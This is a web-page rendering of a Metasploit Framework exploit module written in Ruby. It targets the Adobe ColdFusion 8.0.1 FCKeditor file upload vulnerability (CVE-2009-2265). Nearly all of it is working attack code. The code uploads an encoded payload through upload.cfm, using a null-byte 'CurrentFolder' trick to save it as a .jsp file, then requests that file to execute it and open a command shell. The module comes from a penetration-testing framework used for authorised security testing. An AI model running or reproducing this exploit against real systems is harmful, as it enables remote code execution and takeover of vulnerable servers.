Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/coldfusion_fckeditor.rb
19934 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'ColdFusion 8.0.1 Arbitrary File Upload and Execute',

16
        'Description' => %q{

17
          This module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload

18
          and Execute vulnerability.

19
        },

20
        'Author' => [ 'MC' ],

21
        'License' => MSF_LICENSE,

22
        'Platform' => 'win',

23
        'Privileged' => true,

24
        'References' => [

25
          [ 'CVE', '2009-2265' ],

26
          [ 'OSVDB', '55684'],

27
        ],

28
        'Targets' => [

29
          [

30
            'Universal Windows Target',

31
            {

32
              'Arch' => ARCH_JAVA,

33
              'Payload' =>

34
                {

35
                  'DisableNops' => true,

36
                },

37
            }

38
          ],

39
        ],

40
        'DefaultOptions' => {

41
          'SHELL' => 'cmd.exe'

42
        },

43
        'DefaultTarget' => 0,

44
        'DisclosureDate' => '2009-07-03',

45
        'Notes' => {

46
          'Reliability' => UNKNOWN_RELIABILITY,

47
          'Stability' => UNKNOWN_STABILITY,

48
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

49
        }

50
      )

51
    )

52


53
    register_options(

54
      [

55
        OptString.new('FCKEDITOR_DIR', [ false, 'The path to upload.cfm ', '/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm' ]),

56
      ]

57
    )

58
  end

59


60
  def exploit

61
    page = rand_text_alpha_upper(rand(10) + 1) + ".jsp"

62


63
    dbl = Rex::MIME::Message.new

64
    dbl.add_part(payload.encoded, "application/x-java-archive", nil, "form-data; name=\"newfile\"; filename=\"#{rand_text_alpha_upper(8)}.txt\"")

65
    file = dbl.to_s

66
    file.strip!

67


68
    print_status("Sending our POST request...")

69


70
    res = send_request_cgi(

71
      {

72
        'uri'	=> normalize_uri(datastore['FCKEDITOR_DIR']),

73
        'query'	=> "Command=FileUpload&Type=File&CurrentFolder=/#{page}%00",

74
        'version'	=> '1.1',

75
        'method'	=> 'POST',

76
        'ctype'	=> 'multipart/form-data; boundary=' + dbl.bound,

77
        'data'	=> file,

78
      }, 5

79
    )

80


81
    if (res and res.code == 200 and res.body =~ /OnUploadCompleted/)

82
      print_status("Upload succeeded! Executing payload...")

83


84
      send_request_raw(

85
        {

86
          # default path in Adobe ColdFusion 8.0.1.

87
          'uri'	=> '/userfiles/file/' + page,

88
          'method'	=> 'GET',

89
        }, 5

90
      )

91


92
      handler

93
    else

94
      print_error("Upload Failed...")

95
      return

96
    end

97
  end

98
end

99


100